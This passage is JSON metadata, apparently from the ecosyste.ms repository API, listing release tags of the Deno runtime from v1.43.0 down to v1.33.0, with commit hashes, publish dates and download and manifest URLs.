GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3